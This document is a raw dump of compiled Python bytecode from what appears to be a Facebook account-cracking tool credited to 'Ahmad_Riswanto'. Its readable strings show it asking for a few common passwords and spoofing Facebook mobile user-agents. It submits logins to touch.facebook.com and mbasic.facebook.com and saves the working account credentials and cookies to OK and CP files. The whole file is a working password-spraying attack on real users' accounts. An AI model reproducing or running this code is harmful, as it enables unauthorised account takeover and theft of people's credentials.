s\t\x00\x00\x00CP/%s.txti\x01\x00\x00\x00(\x1d\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R:\x00\x00\x00R\x10\x00\x00\x00R\x11\x00\x00\x00R\x12\x00\x00\x00R\x83\x00\x00\x00RM\x00\x00\x00RW\x00\x00\x00R\x84\x00\x00\x00Rp\x00\x00\x00R\x13\x00\x00\x00Rn\x00\x00\x00R7\x00\x00\x00R-\x00\x00\x00Rm\x00\x00\x00R~\x00\x00\x00t\x06\x00\x00\x00updateR.\x00\x00\x00R\x88\x00\x00\x00t\x06\x00\x00\x00parserR8\x00\x00\x00t\x07\x00\x00\x00cookiest\x08\x00\x00\x00get_dictt\x04\x00\x00\x00keyst\x04\x00\x00\x00joint\x05\x00\x00\x00itemsRY\x00\x00\x00R\x89\x00\x00\x00(\x10\x00\x00\x00R\x8a\x00\x00\x00R\x8b\x00\x00\x00R\\\x00\x00\x00R+\x00\x00\x00R\x8c\x00\x00\x00Rr\x00\x00\x00t\x06\x00\x00\x00kwargsRs\x00\x00\x00t\x01\x00\x00\x00pt\x01\x00\x00\x00bt\x02\x00\x00\x00blR[\x00\x00\x00t\x04\x00\x00\x00gaaat\x03\x00\x00\x00keyR\x99\x00\x00\x00t\x04\x00\x00\x00kuki(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rg\x00\x00\x00[\x01\x00\x00sd\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x06\x01\n\x02\t\x01)\x01\r\x01\x15\x01\x12\x01!\x01\x12\x01\x1e\x01\x12\x01\x17\x02\x14\x01\x03\x01\r\x01\x06\x01\x0c\x01\x0c\x01V\x01\x12\x01\x0f\x01\x1b\x01\x13\x01\x03\x01\x15\x00)\x01\x07\x01\x03\x00\x08\x01Z\x01\x15\x01\x1b\x01A\x01\x12\x01\x17\x01$\x01\x01\x01\x06\x01\x1b\x01\x0f\x01\x17\x01$\x01\x01\x01\n\x02\x0e\x01\x03\x01c\x01\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00s\x01\x04\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x01\x00Wn#\x00\x04t\x02\x00k\n\x00r>\x00\x01\x01\x01d\x03\x00}\x01\x00d\x04\x00}\x01\x00d\x05\x00}\x01\x00n\x01\x00Xt\x03\x00j\x04\x00j\x05\x00d\x06\x00t\x06\x00t\x07\x00t\x08\x00\x83\x01\x00t\x07\x00t\t\x00\x83\x01\x00t\x07\x00t\n\x00\x83\x01\x00f\x04\x00\x16\x83\x01\x00\x01t\x03\x00j\x04\x00j\x0b\x00\x83\x00\x00\x01|\x00\x00j\x0c\x00d\x07\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00t\x07\x00|\x03\x00\x83\x01\x00d\x08\x00k\x05\x00r\xc6\x00|\x03\x00|\x03\x00d\t\x00\x17|\x03\x00d\n\x00\x17|\x03\x00d\x0b\x00\x17g\x04\x00}\x04\x00n
m\x00t\x07\x00|\x03\x00\x83\x01\x00d\x0c\x00k\x01\x00r\xf6\x00|\x03\x00d\t\x00\x17|\x03\x00d\n\x00\x17|\x03\x00d\x0b\x00\x17g\x03\x00}\x04\x00n=\x00t\x07\x00|\x03\x00\x83\x01\x00d\r\x00k\x01\x00r\x1f\x01|\x03\x00d\t\x00\x17|\x03\x00d\x0b\x00\x17g\x02\x00}\x04\x00n\x14\x00|\x03\x00d\t\x00\x17|\x03\x00d\x0b\x00\x17g\x02\x00}\x04\x00y\xc0\x02x\xaf\x02|\x04\x00D]\xa7\x02}\x05\x00i\x00\x00}\x06\x00|\x05\x00j\r\x00\x83\x00\x00}\x05\x00t\x0e\x00j\x0f\x00\x83\x00\x00}\x07\x00|\x07\x00j\x10\x00j\x11\x00i\n\x00d\x0e\x00d\x0f\x006d\x10\x00d\x11\x006d\x12\x00d\x13\x006d\x14\x00d\x15\x006|\x01\x00d\x16\x006d\x17\x00d\x18\x006d\x19\x00d\x1a\x006d\x1b\x00d\x1c\x006d\x1d\x00d\x1e\x006d\x1f\x00d \x006\x83\x01\x00\x01|\x07\x00j\x12\x00d!\x00\x83\x01\x00j\x13\x00}\x08\x00t\x14\x00|\x08\x00d"\x00\x83\x02\x00}\t\x00d#\x00d$\x00d%\x00d&\x00d\'\x00d(\x00d)\x00g\x07\x00}\n\x00xc\x00|\t\x00d*\x00\x83\x01\x00D]U\x00}\x0b\x00yE\x00|\x0b\x00j\x12\x00d+\x00\x83\x01\x00|\n\x00k\x06\x00rG\x02|\x06\x00j\x11\x00i\x01\x00|\x0b\x00j\x12\x00d,\x00\x83\x01\x00|\x0b\x00j\x12\x00d+\x00\x83\x01\x006\x83\x01\x00\x01n\x03\x00w\x00\x02Wq\x00\x02\x01\x01\x01q\x00\x02Xq\x00\x02W|\x06\x00j\x11\x00i\x0b\x00|\x02\x00d-\x006|\x05\x00d.\x006d/\x00d0\x006d/\x00d1\x006d/\x00d2\x006d/\x00d3\x006d/\x00d4\x006d5\x00d6\x006d5\x00d7\x006d5\x00d8\x006d9\x00d:\x006\x83\x01\x00\x01|\x07\x00j\x15\x00d;\x00d<\x00|\x06\x00\x83\x01\x01}\x0c\x00d=\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x18\x00\x83\x00\x00k\x06\x00rx\x03d>\x00j\x19\x00g\x00\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x1a\x00\x83\x00\x00D]\x1c\x00\\\x02\x00}\r\x00}\x0e\x00d?\x00|\r\x00|\x0e\x00f\x02\x00\x16^\x02\x00q\xff\x02\x83\x01\x00}\x0f\x00d@\x00|\x02\x00|\x05\x00|\x0f\x00f\x03\x00\x16GHt\t\x00j\x1b\x00dA\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00dB\x00t\x1c\x00\x16dC\x00\x83\x02\x00j\x05\x00dD\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01Pq=\x01q=\x01dE\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x18\x00\x83\x00\x00k\x06\x00r=\x01dF
\x00|\x02\x00|\x05\x00f\x02\x00\x16GHt\n\x00j\x1b\x00dA\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00dG\x00t\x1c\x00\x16dC\x00\x83\x02\x00j\x05\x00dD\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01Pq=\x01q=\x01q=\x01Wt\x06\x00dH\x007a\x06\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(I\x00\x00\x00Ns\x03\x00\x00\x00.uaR)\x00\x00\x00s\xcb\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]s\x1f\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/323.0.0.46.119;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]s\xcb\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/255.0.0.8.119;]s\\\x00\x00\x00\r\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4 \x1b[0;92mCRACK \x1b[0;93m\xe2\x80\xa2\xe2\x80\xa2>\x1b[0;95m %s/%s \xe2\x80\xa2\xe2\x80\xa2> [OK:-%s] \xc2\xae \x1b[0;95m[CP:-%s] s\x03\x00\x00\x00<=>i\x06\x00\x00\x00Ry\x00\x00\x00Rz\x00\x00\x00R{\x00\x00\x00i\x02\x00\x00\x00i\x03\x00\x00\x00s\x1a\x00\x00\x00https://touch.facebook.comR\x8f\x00\x00\x00s#\x00\x00\x00id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7s\x0f\x00\x00\x00accept-languages\r\x00\x00\x00gzip, 
deflates\x0f\x00\x00\x00accept-encodingsU\x00\x00\x00text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8R\x90\x00\x00\x00s\n\x00\x00\x00user-agents\x12\x00\x00\x00touch.facebook.comR\x91\x00\x00\x00s9\x00\x00\x00https://touch.facebook.com/login/?next&ref=dbl&fl&refid=8R\x92\x00\x00\x00s\t\x00\x00\x00max-age=0s\r\x00\x00\x00cache-controlR=\x00\x00\x00s\x19\x00\x00\x00upgrade-insecure-requestss!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00content-types6\x00\x00\x00https://touch.facebook.com/login/?next&ref=dbl&refid=8s\x0b\x00\x00\x00html.parserR\x93\x00\x00\x00R\x94\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00R\x98\x00\x00\x00R<\x00\x00\x00R^\x00\x00\x00R+\x00\x00\x00R\x99\x00\x00\x00R\x9a\x00\x00\x00R\x9b\x00\x00\x00R*\x00\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\x9f\x00\x00\x00R\xa0\x00\x00\x00R\xa1\x00\x00\x00R\xa2\x00\x00\x00R\xa3\x00\x00\x00R\xa4\x00\x00\x00R\xa5\x00\x00\x00R\xa6\x00\x00\x00sw\x00\x00\x00https://touch.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Ftouch.facebook.com%2F&lwv=100&refid=8RV\x00\x00\x00R\xa7\x00\x00\x00R\xa8\x00\x00\x00s\x05\x00\x00\x00%s=%ss%\x00\x00\x00\r\x1b[0;92m[RAKA_AMANDA] %s|%s|%s\x1b[0;97ms\x05\x00\x00\x00%s|%ss\t\x00\x00\x00OK/%s.txtRl\x00\x00\x00s\t\x00\x00\x00 + %s|%s\nR\xa9\x00\x00\x00s*\x00\x00\x00\r\x1b[0;96m[RAKA_AMANDA] %s|%s\x1b[0;96m 
s\t\x00\x00\x00CP/%s.txti\x01\x00\x00\x00(\x1d\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R:\x00\x00\x00R\x10\x00\x00\x00R\x11\x00\x00\x00R\x12\x00\x00\x00R\x83\x00\x00\x00RM\x00\x00\x00RW\x00\x00\x00R\x84\x00\x00\x00Rp\x00\x00\x00R\x13\x00\x00\x00Rn\x00\x00\x00R7\x00\x00\x00R-\x00\x00\x00Rm\x00\x00\x00R~\x00\x00\x00R\xaa\x00\x00\x00R.\x00\x00\x00R\x88\x00\x00\x00R\xab\x00\x00\x00R8\x00\x00\x00R\xac\x00\x00\x00R\xad\x00\x00\x00R\xae\x00\x00\x00R\xaf\x00\x00\x00R\xb0\x00\x00\x00RY\x00\x00\x00R\x89\x00\x00\x00(\x10\x00\x00\x00R\x8a\x00\x00\x00R\x8b\x00\x00\x00R\\\x00\x00\x00R+\x00\x00\x00R\x8c\x00\x00\x00Rr\x00\x00\x00R\xb1\x00\x00\x00Rs\x00\x00\x00R\xb2\x00\x00\x00R\xb3\x00\x00\x00R\xb4\x00\x00\x00R[\x00\x00\x00R\xb5\x00\x00\x00R\xb6\x00\x00\x00R\x99\x00\x00\x00R\xb7\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rh\x00\x00\x00\x90\x01\x00\x00sf\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x06\x01\x06\x01\n\x02\t\x01)\x01\r\x01\x15\x01\x12\x01!\x01\x12\x01\x1e\x01\x12\x01\x17\x02\x14\x01\x03\x01\r\x01\x06\x01\x0c\x01\x0c\x01V\x01\x12\x01\x0f\x01\x1b\x01\x13\x01\x03\x01\x15\x00)\x01\x07\x01\x03\x00\x08\x01Z\x01\x15\x01\x1b\x01A\x01\x12\x01\x17\x01$\x01\x01\x01\x06\x01\x1b\x01\x0f\x01\x17\x01$\x01\x01\x01\n\x02\x0e\x01\x03\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00s\xb9\x00\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00\x89\x01\x00Wn#\x00\x04t\x02\x00k\n\x00r>\x00\x01\x01\x01d\x03\x00\x89\x01\x00d\x04\x00\x89\x01\x00d\x05\x00\x89\x01\x00n\x01\x00Xd\x06\x00GHt\x03\x00d\x07\x00\x83\x01\x00j\x04\x00d\x08\x00\x83\x01\x00\x89\x00\x00t\x05\x00\x88\x00\x00\x83\x01\x00d\t\x00k\x02\x00rx\x00t\x06\x00d\n\x00\x83\x01\x00\x01n\x00\x00d\x0b\x00GH\x87\x00\x00\x87\x01\x00f\x02\x00d\x0c\x00\x86\x00\x00}\x00\x00t\x07\x00d\r\x00\x83\x01\x00}\x01\x00|\x01\x00j\x08\x00|\x00\x00t\t\x00\x83\x02\x00\x01t\x06\x00d\x0e\x00\x83\x01\x00\x01d\x00\x00S(\x0f\x00\x00\x00Ns\x03\x00\x00\x00.uaR)\x00\x00\x00s\xcb\x00\x00\x0
0Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]s\x1f\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/323.0.0.46.119;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]s\xcb\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/255.0.0.8.119;]sJ\x00\x00\x00\n[+] Type , For 2nd Password For Example : 112233,334455,445566,223344 etcs\x16\x00\x00\x00[+] Enter Passwords : t\x01\x00\x00\x00,R*\x00\x00\x00s\x0f\x00\x00\x00[?] Wrong Inputs0\x00\x00\x00[+] Enter 2-4 Passwords For Fast Cracking Speed\nc\x01\x00\x00\x00\x0e\x00\x00\x00\x08\x00\x00\x00\x13\x00\x00\x00s"\x03\x00\x00t\x00\x00j\x01\x00j\x02\x00d\x01\x00t\x03\x00t\x04\x00t\x05\x00\x83\x01\x00t\x04\x00t\x06\x00\x83\x01\x00t\x04\x00t\x07\x00\x83\x01\x00f\x04\x00\x16\x83\x01\x00\x01t\x00\x00j\x01\x00j\x08\x00\x83\x00\x00\x01|\x00\x00j\t\x00d\x02\x00\x83\x01\x00\\\x02\x00}\x01\x00}\x02\x00y\xc0\x02x\xaf\x02\x88\x00\x00D]\xa7\x02}\x03\x00i\x00\x00}\x04\x00|\x03\x00j\n\x00\x83\x00\x00}\x03\x00t\x0b\x00j\x0c\x00\x83\x00\x00}\x05\x00|\x05\x00j\r\x00j\x0e\x00i\n\x00d\x03\x00d\x04\x006d\x05\x00d\x06\x006d\x07\x00d\x08\x006d\t\x00d\n\x006\x88\x01\x00d\x0b\x006d\x0c\x00d\r\x006d\x0e\x00d\x0f\x006d\x10\x00d\x11\x006d\x12\x00d\x13\x006d\x14\x00d\x15\x006\x83\x01\x00\x01|\x05\x00j\x0f\x00d\x16\x00\x83\x01\x00j\x10\x00}\x06\x00t\x11\x00|\x06\x00d\x17\x00\x83\x02\x00}\x07\x00d\x18\x00d\x19\x00d\x1a\x00d\x1b\x00d\x1c\x00d\x1d\x00d\x1e\x00g\x07\x00}\x08\x00xc\x00|\x07\x00d\x1f\x00\x83\x01\x00D]U\x00}\t\x00yE\x00|\t\x00j\x0f\x00d 
\x00\x83\x01\x00|\x08\x00k\x06\x00rh\x01|\x04\x00j\x0e\x00i\x01\x00|\t\x00j\x0f\x00d!\x00\x83\x01\x00|\t\x00j\x0f\x00d \x00\x83\x01\x006\x83\x01\x00\x01n\x03\x00w!\x01Wq!\x01\x01\x01\x01q!\x01Xq!\x01W|\x04\x00j\x0e\x00i\x0b\x00|\x01\x00d"\x006|\x03\x00d#\x006d$\x00d%\x006d$\x00d&\x006d$\x00d\'\x006d$\x00d(\x006d$\x00d)\x006d*\x00d+\x006d*\x00d,\x006d*\x00d-\x006d.\x00d/\x006\x83\x01\x00\x01|\x05\x00j\x12\x00d0\x00d1\x00|\x04\x00\x83\x01\x01}\n\x00d2\x00|\x05\x00j\x13\x00j\x14\x00\x83\x00\x00j\x15\x00\x83\x00\x00k\x06\x00r\x99\x02d3\x00j\x16\x00g\x00\x00|\x05\x00j\x13\x00j\x14\x00\x83\x00\x00j\x17\x00\x83\x00\x00D]\x1c\x00\\\x02\x00}\x0b\x00}\x0c\x00d4\x00|\x0b\x00|\x0c\x00f\x02\x00\x16^\x02\x00q \x02\x83\x01\x00}\r\x00d5\x00|\x01\x00|\x03\x00|\r\x00f\x03\x00\x16GHt\x06\x00j\x18\x00d6\x00|\x01\x00|\x03\x00f\x02\x00\x16\x83\x01\x00\x01t\x19\x00d7\x00t\x1a\x00\x16d8\x00\x83\x02\x00j\x02\x00d9\x00|\x01\x00|\x03\x00f\x02\x00\x16\x83\x01\x00\x01Pq^\x00q^\x00d:\x00|\x05\x00j\x13\x00j\x14\x00\x83\x00\x00j\x15\x00\x83\x00\x00k\x06\x00r^\x00d;\x00|\x01\x00|\x03\x00f\x02\x00\x16GHt\x07\x00j\x18\x00d6\x00|\x01\x00|\x03\x00f\x02\x00\x16\x83\x01\x00\x01t\x19\x00d<\x00t\x1a\x00\x16d8\x00\x83\x02\x00j\x02\x00d9\x00|\x01\x00|\x03\x00f\x02\x00\x16\x83\x01\x00\x01Pq^\x00q^\x00q^\x00Wt\x03\x00d=\x007a\x03\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(>\x00\x00\x00Ns\\\x00\x00\x00\r\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4 \x1b[0;92mCRACK \x1b[0;93m\xe2\x80\xa2\xe2\x80\xa2>\x1b[0;95m %s/%s \xe2\x80\xa2\xe2\x80\xa2> [OK:-%s] \xc2\xae \x1b[0;95m[CP:-%s] s\x03\x00\x00\x00<=>s\x1b\x00\x00\x00https://mbasic.facebook.comR\x8f\x00\x00\x00s#\x00\x00\x00id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7s\x0f\x00\x00\x00accept-languages\r\x00\x00\x00gzip, 
deflates\x0f\x00\x00\x00accept-encodingsU\x00\x00\x00text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8R\x90\x00\x00\x00s\n\x00\x00\x00user-agents\x13\x00\x00\x00mbasic.facebook.comR\x91\x00\x00\x00s:\x00\x00\x00https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8R\x92\x00\x00\x00s\t\x00\x00\x00max-age=0s\r\x00\x00\x00cache-controlR=\x00\x00\x00s\x19\x00\x00\x00upgrade-insecure-requestss!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00content-types7\x00\x00\x00https://mbasic.facebook.com/login/?next&ref=dbl&refid=8s\x0b\x00\x00\x00html.parserR\x93\x00\x00\x00R\x94\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00R\x98\x00\x00\x00R<\x00\x00\x00R^\x00\x00\x00R+\x00\x00\x00R\x99\x00\x00\x00R\x9a\x00\x00\x00R\x9b\x00\x00\x00R*\x00\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\x9f\x00\x00\x00R\xa0\x00\x00\x00R\xa1\x00\x00\x00R\xa2\x00\x00\x00R\xa3\x00\x00\x00R\xa4\x00\x00\x00R\xa5\x00\x00\x00R\xa6\x00\x00\x00sy\x00\x00\x00https://mbasic.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8RV\x00\x00\x00R\xa7\x00\x00\x00R\xa8\x00\x00\x00s\x05\x00\x00\x00%s=%ss%\x00\x00\x00\r\x1b[0;92m[RAKA_AMANDA] %s|%s|%s\x1b[0;97ms\x05\x00\x00\x00%s|%ss\t\x00\x00\x00OK/%s.txtRl\x00\x00\x00s\t\x00\x00\x00 + %s|%s\nR\xa9\x00\x00\x00s*\x00\x00\x00\r\x1b[0;96m[RAKA_AMANDA] %s|%s\x1b[0;96m 
s\t\x00\x00\x00CP/%s.txti\x01\x00\x00\x00(\x1b\x00\x00\x00R\x10\x00\x00\x00R\x11\x00\x00\x00R\x12\x00\x00\x00R\x83\x00\x00\x00RM\x00\x00\x00RW\x00\x00\x00R\x84\x00\x00\x00Rp\x00\x00\x00R\x13\x00\x00\x00Rn\x00\x00\x00R7\x00\x00\x00R-\x00\x00\x00Rm\x00\x00\x00R~\x00\x00\x00R\xaa\x00\x00\x00R.\x00\x00\x00R\x88\x00\x00\x00R\xab\x00\x00\x00R8\x00\x00\x00R\xac\x00\x00\x00R\xad\x00\x00\x00R\xae\x00\x00\x00R\xaf\x00\x00\x00R\xb0\x00\x00\x00RY\x00\x00\x00R2\x00\x00\x00R\x89\x00\x00\x00(\x0e\x00\x00\x00R\x8a\x00\x00\x00R\\\x00\x00\x00R+\x00\x00\x00Rr\x00\x00\x00R\xb1\x00\x00\x00Rs\x00\x00\x00R\xb2\x00\x00\x00R\xb3\x00\x00\x00R\xb4\x00\x00\x00R[\x00\x00\x00R\xb5\x00\x00\x00R\xb6\x00\x00\x00R\x99\x00\x00\x00R\xb7\x00\x00\x00(\x02\x00\x00\x00t\x03\x00\x00\x00asuR\x8b\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x04\x00\x00\x00main\xd4\x01\x00\x00sL\x00\x00\x00\x00\x02\t\x01)\x01\r\x01\x15\x01\x03\x01\r\x01\x06\x01\x0c\x01\x0c\x01V\x01\x12\x01\x0f\x01\x1b\x01\x13\x01\x03\x01\x15\x00)\x01\x07\x01\x03\x00\x08\x01Z\x01\x15\x01\x1b\x01A\x01\x12\x01\x17\x01$\x01\x01\x01\x06\x01\x1b\x01\x0f\x01\x17\x01$\x01\x01\x01\n\x02\x0e\x01\x03\x01i\x1e\x00\x00\x00s\x16\x00\x00\x00\n\n # [>Program 
Close<](\n\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R:\x00\x00\x00R5\x00\x00\x00Rn\x00\x00\x00RM\x00\x00\x00R1\x00\x00\x00R\x00\x00\x00\x00Re\x00\x00\x00RW\x00\x00\x00(\x02\x00\x00\x00R\xba\x00\x00\x00R\xb2\x00\x00\x00(\x00\x00\x00\x00(\x02\x00\x00\x00R\xb9\x00\x00\x00R\x8b\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rd\x00\x00\x00\xc6\x01\x00\x00s\x1e\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x06\x01\x06\x01\n\x02\x05\x01\x15\x01\x12\x01\r\x01\x05\x02\x12\'\x0c\x01\x10\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\xbe\x00\x00\x00d\x01\x00GHd\x02\x00GHt\x00\x00d\x03\x00\x83\x01\x00}\x00\x00|\x00\x00d\x04\x00k\x02\x00r,\x00t\x01\x00\x83\x00\x00\x01n\x8e\x00|\x00\x00d\x05\x00k\x02\x00r{\x00t\x00\x00d\x06\x00\x83\x01\x00}\x01\x00t\x02\x00d\x07\x00d\x08\x00\x83\x02\x00j\x03\x00|\x01\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\t\x00\x83\x01\x00\x01t\x00\x00d\n\x00\x83\x01\x00\x01t\x01\x00\x83\x00\x00\x01n?\x00|\x00\x00d\x0b\x00k\x02\x00r\xba\x00d\x0c\x00GHt\x06\x00j\x07\x00d\r\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\t\x00\x83\x01\x00\x01t\x00\x00d\x0e\x00\x83\x01\x00\x01t\x01\x00\x83\x00\x00\x01n\x00\x00d\x00\x00S(\x0f\x00\x00\x00Ns\x15\x00\x00\x00[1] Change User-Agents\x16\x00\x00\x00[2] Default User-Agents\x0f\x00\x00\x00\n [?] Choose : R*\x00\x00\x00R=\x00\x00\x00s\x18\x00\x00\x00 [+] Enter User-Agent : s\x03\x00\x00\x00.uaR,\x00\x00\x00i\x01\x00\x00\x00s$\x00\x00\x00\n [!] 
Press Enter To Save User-AgentR>\x00\x00\x00s\xcb\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]s\t\x00\x00\x00rm -f .uas"\x00\x00\x00\n[\xc2\xae] User-Agent Save Successfully(\x08\x00\x00\x00R5\x00\x00\x00R3\x00\x00\x00R2\x00\x00\x00R\x12\x00\x00\x00R\x14\x00\x00\x00R\x15\x00\x00\x00R&\x00\x00\x00R\'\x00\x00\x00(\x02\x00\x00\x00R\x8b\x00\x00\x00t\x04\x00\x00\x00c_ua(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\n\x00\x00\x00setting_ua\xff\x01\x00\x00s"\x00\x00\x00\x00\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\x0c\x01\x16\x01\r\x01\n\x01\n\x01\x0c\x01\x05\x01\r\x01\r\x01\n\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s:\x00\x00\x00y\x11\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01Wn\x07\x00\x01\x01\x01n\x01\x00Xy\x11\x00t\x00\x00j\x01\x00d\x02\x00\x83\x01\x00\x01Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x03\x00\x00\x00NRD\x00\x00\x00RB\x00\x00\x00(\x02\x00\x00\x00R&\x00\x00\x00t\x05\x00\x00\x00mkdir(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x0c\x00\x00\x00raka_andrian\x12\x02\x00\x00s\x10\x00\x00\x00\x00\x01\x03\x00\x11\x01\x03\x00\x04\x01\x03\x00\x11\x01\x03\x00t\x08\x00\x00\x00__main__s\x08\x00\x00\x00git pulls\x0f\x00\x00\x00touch 
login.txt(<\x00\x00\x00R&\x00\x00\x00R-\x00\x00\x00t\x0b\x00\x00\x00ImportErrorR\'\x00\x00\x00t\x03\x00\x00\x00bs4R\x10\x00\x00\x00t\x02\x00\x00\x00reR\x14\x00\x00\x00R6\x00\x00\x00R\x86\x00\x00\x00t\x08\x00\x00\x00calendart\x14\x00\x00\x00multiprocessing.poolR\x00\x00\x00\x00R\x01\x00\x00\x00R\xab\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00R\x83\x00\x00\x00RW\x00\x00\x00R\x84\x00\x00\x00Rp\x00\x00\x00t\x03\x00\x00\x00nowt\x02\x00\x00\x00ctRu\x00\x00\x00R`\x00\x00\x00t\x05\x00\x00\x00bulanR1\x00\x00\x00t\x05\x00\x00\x00nTempt\n\x00\x00\x00ValueErrort\x07\x00\x00\x00currentRw\x00\x00\x00t\x02\x00\x00\x00tat\x02\x00\x00\x00buRv\x00\x00\x00t\x02\x00\x00\x00hat\x02\x00\x00\x00opR\x18\x00\x00\x00t\x05\x00\x00\x00todayt\x07\x00\x00\x00my_datet\x08\x00\x00\x00day_namet\x07\x00\x00\x00weekdayt\x02\x00\x00\x00hrR\x89\x00\x00\x00t\x03\x00\x00\x00tglRo\x00\x00\x00R(\x00\x00\x00R<\x00\x00\x00R3\x00\x00\x00RF\x00\x00\x00RH\x00\x00\x00RI\x00\x00\x00RG\x00\x00\x00Rx\x00\x00\x00Rf\x00\x00\x00Rg\x00\x00\x00Rh\x00\x00\x00Rd\x00\x00\x00R\xbc\x00\x00\x00R\xbe\x00\x00\x00t\x08\x00\x00\x00__name__(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x08\x00\x00\x00<module>\n\x00\x00\x00sp\x00\x00\x00\x0c\x01\x03\x01\x10\x01\r\x01\x11\x02\x03\x01\x10\x01\r\x01\x11\x02`\x01\x10\x01\x10\x01\x10\x01\x10\x02\x06\x01\x06\x01\x06\x01\x06\x02\x0c\x01\t\x01*\x01\x03\x01\x18\x01\n\x01\x0e\x01\r\x01\x0b\x02\x0c\x01\t\x01\t\x01\t\x01\n\x03\t\x07\x0c\x01\x13\x01\x16\x01\x13\x01Z\x03\t\x1b\t\x19\tX\t\x10\t\x10\t\x15\t 